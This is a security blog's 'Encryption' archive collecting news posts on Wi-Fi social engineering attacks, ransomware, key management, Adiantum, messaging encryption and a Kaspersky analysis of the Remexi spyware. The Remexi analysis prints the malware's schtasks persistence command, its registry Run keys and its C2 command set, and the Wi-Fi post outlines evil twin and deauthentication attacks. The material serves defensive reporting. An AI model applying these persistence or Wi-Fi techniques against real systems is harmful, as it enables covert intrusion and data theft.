Category Archives: Encryption

Taking Care of Your Personal Online Security (For Paranoids)

By David Balaban

We live in a world where anonymity and online privacy are impossible things. Your phone calls can be tapped, smartphone data can be stolen, and even the camera and microphone can be turned on remotely. You can be watched from the satellite, in real time. We all live in the matrix and its special services […]

This is a post from HackRead.com Read the original post: Taking Care of Your Personal Online Security (For Paranoids)

No One is Safe: the Five Most Popular Social Engineering Attacks Against Your Company’s Wi-Fi Network

Your Wi-Fi routers and access points all have strong WPA2 passwords, unique SSIDs, the latest firmware updates, and even MAC address filtering. Good job, networking and cybersecurity teams! However, is your network truly protected? TL;DR: NO!

In this post, I’ll cover the most common social engineering Wi-Fi association techniques that target your employees and other network users. Some of them are very easy to launch, and if your users aren’t aware of and know how to avoid them, it’s only a matter of time until your network is breached.

Attackers only need a Unix computer (which can be as inexpensive and low-powered as a $30 Raspberry Pi), a Wi-Fi adapter with monitor mode enabled, and a 3G modem for remote control. They can also buy ready-made stations with all of the necessary tools and user interface, but where’s the fun in that? 

Figure 1: Wi-Fi hacking tools

1) Evil Twin AP

An effortless and easy technique. All attackers need to do is set up an open AP (Access Point) with the same or similar SSID (name) as the target and wait for someone to connect. Place it far away from the target AP where the signal is low and it’s only a matter of time until some employee connects, especially in big organizations. Alternatively, impatient attackers may follow the next technique.

Figure 2: Evil Twin Demonstration

2. Deauthentication / Disassociation Attack

In the current IEEE 802.11 (Wi-Fi protocol) standards, whenever a wireless station wants to leave the network, it sends a deauthentication or disassociation frame to the AP. These two frames are sent unencrypted and are not authenticated by the AP, which means anyone can spoof those packets.

This technique makes it very easy to sniff the WPA 4-way handshake needed for a Brute Force attack, since a single deauthentication packet is enough to force a client to reconnect.

Even more importantly, attackers can spoof these messages repeatedly and thus disable the communication between Wi-Fi clients and the target AP, which increases the chance your users will connect to the attacker’s twin AP. Combining these 2 techniques works very well, but still depends on the user connecting to the fake AP. The following technique does not, however.

3. Karma Attack

Whenever a user device’s Wi-Fi is turned on but not connected to a network, it openly broadcasts the SSIDs of previously-associated networks in an attempt to connect to one of them. These small packets, called probe requests, are publicly viewable by anyone in the area.

The information gathered from probe requests can be combined with geo-tagged wireless network databases such as Wigle.net to map the physical location of these networks.

If one of the probe requests contains an open Wi-Fi network SSID, then generating the same AP for which the user device is sending probes will cause the user’s laptop, phone or other device to connect to an attacker’s fake AP automatically.

Forcing any connected device to send probe requests is very easy, thanks to the previous technique.

Figure 3: Sniffing Probe Requests

4. Known Beacons

The final attack I’ll discuss that can lead your user to connect to an attacker’s fake AP is “Known Beacons.” This is a random technique where attacker broadcast dozens of beacon frames of common SSIDs that nearby wireless users have likely connected to in the past (like AndroidAP, Linksys, iPhone, etc.). Again, your users will automatically authenticate and connect due to the “Auto-Connect” feature.

An attacker has connected with your user, now what?

Once attackers have access to your user, there’s a variety of stuff they can do: sniff the victim’s traffic, steal login credentials, packet injection, port scan, exploit the user device, etc. But most importantly, the attacker can also get the target AP password by a victim-customized web phishing attack.

Since the victim is using the black hat hacker’s machine as a router, there are many ways to manipulate the phishing page to look convincing. One of them is a captive portal. For example, by DNS hijacking, he can forward all web requests to his local web server, so that his page appears no matter where the victim tries to access it from. Even worse, most operating systems will identify his page as a legitimate captive portal and open it automatically!

Figure 4: Captive Portal Attack

5. Bypassing MAC Address Filtering

As mentioned, your networks may use MAC Filtering, which means only predefined devices can connect to your network and having the password is not enough. How much does that help?

All MAC addresses are hard-coded into a network card and can never be changed. However, attackers can change the MAC address in their operating system and pretend to be one of the allowed devices can be done easily.

Attackers can easily get the MAC address of one of your network’s allowed devices, since every packet sent to and from your employee’s device includes its MAC address unencrypted. Of course, attackers have to force your employee’s device to disconnect (using deauthentication packets) before connecting to your network using the hacked MAC address.

How Can You Mitigate?

Detecting an Evil AP in your area can be done easily by scanning and comparing configurations of nearby access points. However, as with any social engineering attack, the best way to mitigate is by training your users, which is a critical element of security.

Make sure your network users understand the risk of connecting to open access points and are well aware of the techniques mentioned. Running simulations of the above attacks is also recommended.

Finally, while specific techniques will come and go, social engineering will always remain a popular strategy for attackers. So make sure you and your users remain aware!

The post No One is Safe: the Five Most Popular Social Engineering Attacks Against Your Company’s Wi-Fi Network appeared first on Blog.

Threat Actors Impersonate Oil and Gas Companies in Latest Shade Ransomware Attack

Digital criminals tried to impersonate oil and gas companies in a recent attack campaign distributing Shade ransomware.

Between January and February, Yoroi observed an attack campaign leveraging email as an infection vector. Each of the emails came with an attached ZIP file called slavneft.zakaz.zip. The name of this file means “Slavneft order” in English, which includes a direct reference to the Russian oil and gas company PAO NGK Slavneft. Building on this disguise, the ZIP file contained a JavaScript file named «ПАО «НГК «Славнефть» подробности заказа, which translates to “PAO NGK Slavneft order details” in English.

Clicking on the JavaScript file activated a downloader that pulls Shade from one of several compromised websites. At that point, the ransomware payload, which had a VirusTotal detection rate of just 24 out of 69 tools at the time of discovery, encrypted all of the infected machine’s files using Advanced Encryption Standard (AES). It then created a ransom note, which included instructions for victims to visit a dark web site so they could receive payment instructions from the attackers.

A Busy 2019 for Shade

Yoroi isn’t the only digital defense company that recently detected a new Shade ransomware campaign. In January 2019, ESET witnessed a large uptick in emails containing malicious JavaScript attachments, including those responsible for downloading Shade. In February, Carbon Black observed a similar campaign also leveraging JavaScript attachments to target primarily Russian speakers.

These attacks come at a time when targeted ransomware remains one of the most prominent threats targeting organizations. Europol said as much in 2018 after it observed threat actors turning to targeted ransomware, not banking Trojans, as their preferred payload in financially motivated cyberattacks. This preference contributed to Cybersecurity Ventures‘ estimate that ransomware damages would surpass $8 billion by the end of 2018.

How to Protect Against Shade Ransomware

Security professionals can help defend their organizations against Shade ransomware and similar malware by making sure their endpoint software is up-to-date and all applications are updated to their most secure versions. Organizations should also make sure to isolate their data backup systems so that attackers can’t encrypt these copies in the event of a successful ransomware infection.

The post Threat Actors Impersonate Oil and Gas Companies in Latest Shade Ransomware Attack appeared first on Security Intelligence.

Severe flaws in password managers let hackers extract clear-text passwords

By Waqas

Password Managers aren’t as secure as you might assume – Security researchers claim that hackers can steal master passwords in PC memory. Password managers are considered as one of the most suitable options when it comes to keeping your online credentials safe from being hijacked and exploited by cybercriminals. However, unfortunately, the latest research findings […]

This is a post from HackRead.com Read the original post: Severe flaws in password managers let hackers extract clear-text passwords

Lessons from the Encryption Front Line: Core Components in the Cloud

This is the second installment in a multipart series about data encryption. Be sure to read part one for the full story.

Now that we understand the common threats facing organizations and how to select the right solution for data-at-rest encryption (DaRE), what’s the next step in your data encryption journey?

Encrypting data is the relatively easy part of the solution, but securely managing keys is a major challenge. According to the National Institute of Standards and Technology (NIST), “Keys are analogous to the combination of a safe. If an adversary knows the combination, the strongest safe provides no security against penetration. Similarly, poor key management may easily compromise strong algorithms.”

DaRE needs more than software to encrypt data, because the keys still need to be managed. Let’s dive deeper into the key management challenge, the core components needed to manage keys effectively and the open standards security teams should use in their cloud environments.

The Encryption Key Management Challenge

In DaRE solutions, symmetric encryption is used for speed, and the same key is used to encrypt and decrypt the data. The security of the system relies on the encryption key being kept secret. Most organizations now encrypt disks within a laptop. To start the decrypting process, a password must be entered manually, which is impractical for cloud environments with thousands of servers.

If the data is being decrypted after a system has started, the encryption software can use a secret key stored locally on the server, which will be in an obscured format that can be decoded. The risk here is that a privileged insider or threat actor could potentially decode the key and decrypt the data. Therefore, security teams need a way to protect their encryption keys.

Unscrambling the Encryption Solution Components

A typical cloud encryption solution has three core components: an encryption client, a key management server (KMS) and a hardware security module (HSM).

The encryption client performs the actual encryption using a data encryption key (DEK). Since it needs to be stored encrypted, the DEK itself is obscured using a key encryption key (KEK).

The KEK is obtained from a KMS, which contains many hundreds or thousands of keys in a database. Once again, the KEKs need to be encrypted using a master encryption key (MEK) because there is a risk that the KMS could be compromised. The MEK is stored in the HSM, which enables the security team to store a key in hardware that physically prevents tampering or loss of the MEK.

Creating an Open Encryption Solution

In the past, encryption solutions have been built around proprietary protocols, making integration difficult. That’s why OASIS defined a set of standards to improve interoperability between encryption and key management solutions from different vendors.

Over the past few years, vendors have increasingly adopted standard protocols for communication between the KMS and HSM, such as OASIS PKCS#11, as well as communication between the encryption client and the KSM, such as the OASIS KMIP protocol. Look for solutions that use these standards when putting together your encryption strategy.

Encryption Solutions Are Maturing

With a standard set of components that support open standards, encryption technology is gradually maturing to make implementation and encryption key management easier. In cloud environments, these components are often available in a lower-cost implementation known as bring-your-own-key (BYOK), which integrates with supported DaRE solutions. These solutions are now reaching high levels of assurance with HSMs offering FIPS 140-2 Level 4 in the cloud.

Depending on your needs, you can develop encryption solutions based on open standards from components you build and run yourself or source them as managed services from cloud providers.

The post Lessons from the Encryption Front Line: Core Components in the Cloud appeared first on Security Intelligence.

Podcast Episode 133: Quantum Computing’s Security Challenge and Life After Passwords

The arrival of functional quantum computers may be closer than you think. I'm joined by Avesta Hojjati, Head of DigiCert Labs and Brian LaMacchia, Distinguished Engineer and Head of the Security and Cryptography Group at Microsoft Research to talk about coming quantum revolution and what it means for security.

The post Podcast Episode 133:...

Read the whole entry... »

Related Stories

Bleichenbacher Oracle Attack Variation Subjects TLS Encryption To Further Vulnerabilities

Encryption is one of the safest forms of securing data; yet academics recently found a vulnerability that allowed attackers to

Bleichenbacher Oracle Attack Variation Subjects TLS Encryption To Further Vulnerabilities on Latest Hacking News.

Adiantum will bring encryption on Android devices without cryptographic acceleration

Google announced Adiantum, a new encryption method devised to protect Android devices without cryptographic acceleration.

Google announced Adiantuma new encryption method devised to protect Android devices without cryptographic acceleration.

“Adiantum is an innovation in cryptography designed to make storage encryption more efficient for devices without cryptographic acceleration, to ensure that all devices can be encrypted.” reads the announcement published by Google.

Since Android version 6.0, user data are protected with Advanced Encryption Standard (AES) encryption, however, the feature is slow on mobile devices using low-end processors that haven’t hardware to support it.

The new encryption form has been created for devices running Android 9 and higher that doesn’t support AES CPU instructions.

For this reason, Google developed Adiantum that supports the ChaCha stream cipher in a length-preserving mode.
ChaCha allows improving security and performance in the absence of dedicated hardware acceleration.

Google experts pointed out that Adiantum encryption/decryption processes on ARM Cortex-A7 processors are around five times faster compared to AES-256-XTS.

Adiantum performance

“Unlike modes such as XTS or CBC-ESSIV, Adiantum is a true wide-block mode: changing any bit anywhere in the plaintext will unrecognizably change all of the ciphertext, and vice versa.  It works by first hashing almost the entire plaintext,” continues Google.

“We also hash a value called the “tweak” which is used to ensure that different sectors are encrypted differently. This hash is then used to generate a nonce for the ChaCha encryption. After encryption, we hash again, so that we have the same strength in the decryption direction as the encryption direction”  

Adiantum could represent the optimal solution for a wide range of devices that haven’t dedicated hardware for encryption, such as smartwatches, smart TVs, and other IoT devices running on Android OS.

“Our hope is that Adiantum will democratize encryption for all devices. Just like you wouldn’t buy a phone without text messaging, there will be no excuse for compromising security for the sake of device performance.”
wrote Eugene Liderman, Director of Mobile Security Strategy, Android Security & Privacy Team, says. 

“Everyone should have privacy and security, regardless of their phone’s price tag,”

Google published technical details about the new encryption form in the paper titled “Adiantum: length-preserving encryption for entry-level processors.”

Pierluigi Paganini

(SecurityAffairs – Android, encryption)

The post Adiantum will bring encryption on Android devices without cryptographic acceleration appeared first on Security Affairs.

Compromising vital infrastructure: communication

Have you ever been witness to a Wi-Fi failure in a household with school-aged children? If so, I don’t have to convince you that communication qualifies as vital infrastructure. For the doubters: when you see people risking their lives in traffic just to check their phone, you’ll understand why most adults consider instant communication to be vital as well.

Forms of communication

Humanity has come a long way in communication techniques. From drawings on the cave wall to wartime messages sent via courier to the Pony Express and now, the Internet. Modern communication tools enable us to reach most places across the world in a matter of seconds.

What are the lines of communications that are more or less vital to our everyday life?

  • The Internet
  • Telephone lines
  • Mobile telephone networks
  • TV and radio broadcasting

Granted, if one of these communication forms fails, part of its traffic can be taken over by another form, but they all have their specific pros and cons that make a durational outage hard to cope with. For example, most smartphones are capable of using both the mobile networks and the Internet, but the latter is limited to when they have Wi-Fi access. When cell phone towers go down, as they did during 9/11, users could send messages via Internet messaging services—at that time, AIM, but today WhatsApp, Facebook Messenger, or other platforms.

Growing importance

In the list I posted earlier, you may have felt that I missed out on letters and postcards, or snail-mail as we often call it. This is because a growing number of companies are keeping us informed through email, their websites, text messages, and other forms of communication that are way faster than postal services. Most companies will still send letters and paper bills if you ask for them, but it’s no longer the default. Our mail delivery services are increasingly starting to resemble package delivery services. They see a growing number of deliveries that require a physical transfer of an object rather than information alone.

Instead, the majority of modern communication is digital.

Securing digital communication

Digital information that needs to be kept from prying eyes and eavesdropping is usually encrypted. To establish secure communication, one may use encrypted mail, crypto-phones, and secure protocols on the Internet. Most of these encryptions are strong enough to withstand brute force attempts at entry—at least for long enough to outlive the usefulness of intercepting the message. Future computer systems like qubit quantum computers, however, may require us to upgrade the encryption strength that we use for these methods.

Breaking the Internet

Because of the way the Internet has grown and become more versatile, the Internet backbone is robust enough to withstand DDoS attacks of a large magnitude. Yet, there have been instances where an entire country, such as North Korea, was taken offline, or where an attack on a major DNS provider caused a serious disruption in the number of sites we were able to visit.

These attacks were targeted at systems that were important for specific parts of the Internet. Nevertheless, they demonstrated that there are weaknesses in the infrastructure that can be exploited to paralyze parts of the Internet, and therefore, parts of our vital communication.

Misinformation and fake news

Another growing problem with predominantly online communication is the spreading of fake news and deliberate misinformation. The most common reasons for spreading misinformation are political and financial gain, as well as attention. The problem has reached a size and impact that caused government bodies like the EU to announce countermeasures. During that process, and due to other influences social media has over its users, many organizations felt the need to hired hordes of moderators who are tasked with keeping the information spread on their platforms as clean and as honest as possible. This still fell short in some instances, such as the dramatic events in Myanmar where Facebook was used as a tool for ethnic cleansing. And these are not the only problems social media are trying to deal with.

propaganda or truth

Malware and communication

Communication is also a vital part of some types of malware, such as backdoors, Trojans, and especially spyware. After all, what use is it to spy on someone if you are unable to get your hands on the gathered information? Traditional malware communication relies on the use of Command and Control (C&C) servers. But since those servers can be taken down or blocked, malware authors have been looking at rotation systems like Domain Generating Algorithms and some other creative ideas, like using social media and other public platforms.

While you may use social media to stay in contact with family and friends, there are many forms of malware that use those same media for different purposes. Botnets are known to use Twitter as an outlet for spam, fraud, and fake news. But they also use it to send commands to Remote Access Trojans (RATs) that wait for code hidden in memes posted by a particular account.

In addition, malware exploits messenger platforms to communicate instructions. There’s the Goodsender malware, for which threat actors used the Telegram messenger platform to communicate with the malware and send HTTPS-protected instructions. Another well-known phenomenon are the Facebook Messenger apps that spread in a worm-like fashion by sending out links to friends in an attempt to trick users into being installed.

Social media countermeasures

While social media is struggling with its public reputation these days, they at least seem ready to take baby steps forward in tightening up security—whether that’s from political pressure or self-awareness. At an event in Brussels, Nick Clegg, Facebook’s head of global public relations, stated:

We are at the start of a discussion which is no longer about whether social media should be regulated, but how it should be regulated. We recognize the value of regulation, and we are committed to working with policymakers to get it right.

Working out the “how” could turn into a long-winded discussion, however. Maybe the rumors about a space laser communications system represent a step in the right direction. In theory, such a system could be used to improve security.

Better communication results in better security

Having all the facts helps us to improve security. Making sure that this information reaches the people that need it is a matter of effective communication strategy. And in some cases, it may be just as important that the information is not communicated so that it doesn’t fall into the wrong hands.

The National Intelligence Strategy released in January 2019 by the Office of the Director of National Intelligence states:

Nearly all information, communication networks, and systems will be at risk for years to come.

Therefore, an important part of communication strategy must be to recognize the risk and integrate the proper tools—such as end-to-end encryption or intel on certain platforms known to be used by cybercriminals, for example. The National Intelligence Strategy goes on to say that they’ll be “harnessing the full talent and tools of the IC [Intelligence Community] by bringing the right information, to the right people, at the right time.”

Cyberattacks on communication infrastructure

A pretty bizarre method of abusing communication happened when a family was scared into believing there was an ongoing nuclear attack, as some prankster accessed their Nest camera to issue realistic warnings about missiles heading to the US from North Korea.

More worrying is the trend for ransomware authors (especially groups using SamSam) to aim their targets at cities and small government bodies with the aim of shutting down infrastructure, including communications. Taking down a city website, as was the case in the city of Atlanta, cripples an important medium of disseminating citizen information, not to mention that the costs related to getting everything back online were absorbed with taxpayer money that could have been better spent on other services.

Information is crucial

Important decisions may be postponed when the person or body that is supposed to make that decision is unable to gather the information necessary. Communications are also a vital part of some malware infections. Perhaps organizations can use some of the ingenious methods malware authors have thought up when looking for ways to make vital lines of communication more robust. Redundancy is a good thing when it allows us to use multiple methods and networks to transmit the same information. On the other hand, it also enlarges the attack surface when it comes to sharing confidential information.

This does have an upside for the quality of free information. Because of all the communication options out there, some regimes are having an increasingly difficult time shielding their population from information they would rather keep under the carpet. This hasn’t stopped some, like China’s Great Firewall, from trying, though.

Communication is everywhere

Communication is truly always available to nearly everyone that wants it in the western world, and this readiness—and the danger that lurks with it—may shape how our generation is viewed far into the future. This may be the era when communication both flourished to its true potential, and reached its limits. After all, pitfalls are inherent when technology develops faster than regulation can keep up.

Maybe the developments we are seeing now are just another step forward for the eventual better regulation of communication, though I’m convinced it will not be the last step regulators need to take. In fact, 5G is already waiting around the corner to add another level in speed and bandwidth to an already connected society. Let’s see how this new technology impacts an already complex tapestry of communication triumphs and failures.

The post Compromising vital infrastructure: communication appeared first on Malwarebytes Labs.

Adiantum: A new encryption scheme for low-end Android devices

Google has created an alternative disk and file encryption mode for low-end Android devices that don’t have enough computation power to use the Advanced Encryption Standard (AES). About Adiantum For the new encryption scheme, dubbed Adiantum, Google used existing standards, ciphers and hashing functions, but combined them in a more efficient way. Paul Crowley and Eric Biggers from the Android Security & Privacy Team noted that they have high confidence in the security of the … More

The post Adiantum: A new encryption scheme for low-end Android devices appeared first on Help Net Security.

Google Created Faster Storage Encryption for All Low-End Devices

Google has launched a new encryption algorithm that has been built specifically to run on mobile phones and smart IoT devices that don't have the specialized hardware to use current encryption methods to encrypt locally stored data efficiently. Encryption has already become an integral part of our everyday digital activities. However, it has long been known that encryption is expensive, as

Merging Facebook Messenger, WhatsApp, and Instagram: a technical, reputational hurdle

Secure messaging is supposed to be just that—secure. That means no backdoors, strong encryption, private messages staying private, and, for some users, the ability to securely communicate without giving up tons of personal data.

So, when news broke that scandal-ridden, online privacy pariah Facebook would expand secure messaging across its Messenger, WhatsApp, and Instagram apps, a broad community of cryptographers, lawmakers, and users asked: Wait, what?

Not only is the technology difficult to implement, the company implementing it has a poor track record with both user privacy and online security.

On January 25, the New York Times reported that Facebook CEO Mark Zuckerberg had begun plans to integrate the company’s three messaging platforms into one service, allowing users to potentially communicate with one another across its separate mobile apps. According to the New York Times, Zuckerberg “ordered that the apps all incorporate end-to-end encryption.”

The initial response was harsh.

Abroad, Ireland’s Data Protection Commission, which regulates Facebook in the European Union, immediately asked for an “urgent briefing” from the company, warning that previous data-sharing proposals raised “significant data protection concerns.”

In the United States, Democratic Senator Ed Markey for Massachusetts said in a statement: “We cannot allow platform integration to become privacy disintegration.”

Cybersecurity technologists swayed between cautious optimism and just plain caution.

Some professionals focused on the clear benefits of enabling end-to-end encryption across Facebook’s messaging platforms, emphasizing that any end-to-end encryption is better than none.

Former Facebook software engineer Alec Muffet, who led the team that added end-to-end encryption to Facebook Messenger, said on Twitter that the integration plan “clearly maximises the privacy afforded to the greatest [number] of people and is a good idea.”

Others questioned Facebook’s motives and reputation, scrutinizing the company’s established business model of hoovering up mass quantities of user data to deliver targeted ads.

John Hopkins University Associate Professor and cryptographer Matthew Green said on Twitter that “this move could potentially be good or bad for security/privacy. But given recent history and financial motivations of Facebook, I wouldn’t bet my lunch money on ‘good.’”

On January 30, Zuckerberg confirmed the integration plan during a quarterly earnings call. The company hopes to complete the project either this year or in early 2020.

It’s going to be an uphill battle.

Three applications, one bad reputation

Merging three separate messaging apps is easier said than done.

In a phone interview, Green said Facebook’s immediate technological hurdle will be integrating “three different systems—one that doesn’t have any end-to-end encryption, one where it’s default, and one with an optional feature.”

Currently, the messaging services across WhatsApp, Facebook Messenger, and Instagram have varying degrees of end-to-end encryption. WhatsApp provides default end-to-end encryption, whereas Facebook Messenger provides optional end-to-end encryption if users turn on “Secret Conversations.” Instagram provides no end-to-end encryption in its messaging service.

Further, Facebook Messenger, WhatsApp, and Instagram all have separate features—like Facebook Messenger’s ability to support more than one device and WhatsApp’s support for group conversations—along with separate desktop or web clients.

Green said to imagine someone using Facebook Messenger’s web client—which doesn’t currently support end-to-end encryption—starting a conversation with a WhatsApp user, where encryption is set by default. These lapses in default encryption, Green said, could create vulnerabilities. The challenge is in pulling together all those systems with all those variables.

“First, Facebook will have to likely make one platform, then move all those different systems into one somewhat compatible system, which, as far as I can tell, would include centralizing key servers, using the same protocol, and a bunch of technical development that has to happen,” Green said. “It’s not impossible. Just hard.”

But there’s more to Facebook’s success than the technical know-how of its engineers. There’s also its reputation, which, as of late, portrays the company as a modern-day data baron, faceplanting into privacy failure after privacy failure.

After the 2016 US presidential election, Facebook refused to call the surreptitious collection of 50 million users’ personal information a “breach.” When brought before Congress to testify about his company’s role in a potential international disinformation campaign, Zuckerberg deflected difficult questions and repeatedly claimed the company does not “sell” user data to advertisers. But less than one year later, a British parliamentary committee released documents that showed how Facebook gave some companies, including Airbnb and Netflix, access to its platform in exchange for favors—no selling required.

Five months ago, Facebook’s Onavo app was booted from the Apple App Store for gathering app data, and early this year, Facebook reportedly paid users as young as 13-years-old to install the “Facebook Research” app on their own devices, an app intended strictly for Facebook employee use. Facebook pulled the app, but Apple had extra repercussions in mind: It removed Facebook’s enterprise certificate, which the company relied on to run its internal developer apps.

These repeated privacy failures are enough for some users to avoid Facebook’s end-to-end encryption experiment entirely.

“If you don’t trust Facebook, the place to worry is not about them screwing up the encryption,” Green said. “They want to know who’s talking to who and when. Encryption doesn’t protect that at all.”

If not Facebook, then who?

Reputationally, there are at least two companies that users look to for both strong end-to-end encryption and strong support of user privacy and security—Apple and Signal, which respectively run the iMessage and Signal Messenger apps.

In 2013, Open Whisper Systems developed the Signal Protocol. This encryption protocol provides end-to-end encryption for voice calls, video calls, and instant messaging, and is implemented by WhatsApp, Facebook Messenger, Google’s Allo, and Microsoft’s Skype to varying degrees. Journalists, privacy advocates, cryptographers, and cybersecurity researchers routinely praise Signal Messenger, the Signal Protocol, and Open Whisper Systems.

“Use anything by Open Whisper Systems,” said former NSA defense contractor and government whistleblower Edward Snowden.

“[Signal is] my first choice for an encrypted conversation,” said cybersecurity researcher and digital privacy advocate Bruce Schneier.

Separately, Apple has proved its commitment to user privacy and security through statements made by company executives, updates pushed to fix vulnerabilities, and legal action taken in US courts.

In 2016, Apple fought back against a government request that the company design an operating system capable of allowing the FBI to crack an individual iPhone. Such an exploit, Apple argued, would be too dangerous to create. Earlier last year, when an American startup began selling iPhone-cracking devices—called GrayKey—Apple fixed the vulnerability through an iOS update.

Repeatedly, Apple CEO Tim Cook has supported user security and privacy, saying in 2015: “We believe that people have a fundamental right to privacy. The American people demand it, the constitution demands it, morality demands it.”

But even with these sterling reputations, the truth is, cybersecurity is hard to get right.

Last year, cybersecurity researchers found a critical vulnerability in Signal’s desktop app that allowed threat actors to obtain users’ plaintext messages. Signal’s developers fixed the vulnerability within a reported five hours.

Last week, Apple’s FaceTime app, which encrypts video calls between users, suffered a privacy bug that allowed threat actors to briefly spy on victims. Apple fixed the bug after news of the vulnerability spread.

In fact, several secure messaging apps, including Telegram, Viber, Confide, Allo, and WhatsApp have all reportedly experienced security vulnerabilities, while several others, including Wire, have previously drawn ire because of data storage practices.

But vulnerabilities should not scare people from using end-to-end encryption altogether. On the contrary, they should spur people into finding the right end-to-end encrypted messaging app for themselves.

No one-size-fits-all, and that’s okay

There is no such thing as a perfect, one-size-fits-all secure messaging app, said Electronic Frontier Foundation Associate Director of Research Gennie Gebhart, because there’s no such thing as a perfect, one-size-fits-all definition of secure.

“In practice, for some people, secure means the government cannot intercept their messages,” Gebhart said. “For others, secure means a partner in their physical space can’t grab their device and read their messages. Those are two completely different tasks for one app to accomplish.”

In choosing the right secure messaging app for themselves, Gebhart said people should ask what they need and what they want. Are they worried about governments or service providers intercepting their messages? Are they worried about people in their physical environment gaining access to their messages? Are they worried about giving up their phone number and losing some anonymity?

In addition, it’s worth asking: What are the risks of an accident, like, say, mistakenly sending an unencrypted message that should have been encrypted? And, of course, what app are friends and family using?

As for the constant news of vulnerabilities in secure messaging apps, Gebhart advised not to overreact. The good news is, if you’re reading about a vulnerability in a secure messaging tool, then the people building that tool know about the vulnerability, too. (Indeed, developers fixed the majority of the security vulnerabilities listed above.) The best advice in that situation, Gebhart said, is to update your software.

“That’s number one,” Gebhart said, explaining that, though this line of defense is “tedious and maybe boring,” sometimes boring advice just works. “Brush your teeth, lock your door, update your software.”

Cybersecurity is many things. It’s difficult, it’s complex, and it’s a team sport. That team includes you, the user. Before you use a messenger service, or go online at all, remember to follow the boring advice. You’ll better secure yourself and your privacy.

The post Merging Facebook Messenger, WhatsApp, and Instagram: a technical, reputational hurdle appeared first on Malwarebytes Labs.

The problem with vulnerable IoT companion apps

There’s no shortage of exploitable security holes in widely used Internet of Things devices, so it shouldn’t come as a surprise that the communication between many of those devices and their companion apps is not encrypted. The research A group of researchers from Brazil’s Federal University of Pernambuco and the University of Michigan have analyzed 32 unique companion Android apps for 96 WiFi and Bluetooth-enabled devices popular on Amazon. They searched for answers to the … More

The post The problem with vulnerable IoT companion apps appeared first on Help Net Security.

Safer Internet Day: Security vs. Convenience

Safer Internet Day: Security vs. Convenience

It isn’t easy to be secure all the time — this is especially true if you are new to cybersecurity. A well-formed security plan takes deliberate effort at the very least, and constant vigilance at most. Even the top experts have room to improve because cybersecurity is a constantly moving target.

Unfortunately, most internet users aren’t using best practices.

The top two [passwords] have been left unchanged for the fifth year in a row.

Continue reading Safer Internet Day: Security vs. Convenience at Sucuri Blog.

$137milllion Worth of QuadrigaCX’s Customers’ Bitcoin Stuck in The Abyss

Cryptocurrency exchange, QuadrigaCX, has suffered a security incident after it lost control of its customers assets. $137 million worth of

$137milllion Worth of QuadrigaCX’s Customers’ Bitcoin Stuck in The Abyss on Latest Hacking News.

A Review Of Cyclonis Password Manager – Manages Your Passwords For Free!

Best practice dictates that users should use a different password for every online account they own, for an average internet

A Review Of Cyclonis Password Manager – Manages Your Passwords For Free! on Latest Hacking News.

Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities

Executive Summary

Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran. The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation. This malware has previously been associated with an APT actor that Symantec calls Chafer.

The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible. The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data. Its C2 is based on IIS using .asp technology to handle the victims’ HTTP requests.

Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment. They most likely used the Qt Creator IDE in a Windows environment. The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive.

XOR and RC4 encryption is used with quite long unique keys for different samples. Among all these random keys once the word “salamati” was also used, which means “health” in Farsi.

Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent. This blogpost is based in our original report shared with our APT Intelligence Reporting customers last November 2018. For more information please contact: intelreports@kaspersky.com

Technical analysis

The main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec back in 2015. The newest module’s compilation timestamp is March 2018. The developers used GCC compiler on Windows in the MinGW environment.

Inside the binaries the compiler left references to the names of the C source file modules used: “operation_reg.c”, “thread_command.c” and “thread_upload.c”. Like mentioned in modules file names the malware consists of several working threads dedicated to different tasks, including C2 command parsing and data exfiltration. For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP.

Proliferation

So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread. However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi´s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware. This dropper used an FTP with hardcoded credentials to receive its payload. FTP server was not accessible any more at the time of our analysis.

Malware features

Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands. Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s data.

Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary functions. The Remexi developers seem to rely on legitimate Microsoft utilities, which we enumerate in the table below.

Utility Usage
extract.exe Deploys modules from the .cab file into the working Event Cache directory
bitsadmin.exe Fetches files from the C2 server to parse and execute commands. Send exfiltrated data
taskkill.exe Ends working cycle of modules

Persistence

Persistence modules are based on scheduled tasks and system registry. Mechanisms vary for different OS versions. In the case of old Windows versions like XP, main module events.exe runs an edited XPTask.vbs Microsoft sample script to create a weekly scheduled task for itself. For newer operating systems, events.exe creates task.xml as follows:

Then it creates a Windows scheduled task using the following command:

schtasks.exe /create /TN \"Events\\CacheTask_<user_name_here>" /XML \"<event_cache_dir_path>t /F"

At the system registry level, modules achieve persistence by adding themselves into the key:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

when it finds possible add values to the Winlogon subkey, and in

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager. All such indicators of comprometation are mentioned in correspondent appendix below.

Commands

All the commands received from the C2 are first saved to an auxiliary file and then stored encrypted in the system registry. The standalone thread will decrypt and execute them.

Command Description
search Searches for corresponding files
search&upload Encrypts and adds the corresponding files to the upload directory with the provided name
uploadfile Encrypts and adds the specified file to the upload directory with the provided name
uploadfolder Encrypts and adds the mentioned directory to the upload directory with the provided name
shellexecute Silently executes received command with cmd.exe
wmic Silently executes received command with wmic.exe (for WMI commands)
sendIEPass Encrypts and adds all gathered browser data into files for upload to C2
uninstall Removes files, directory and BITS tasks

Cryptography

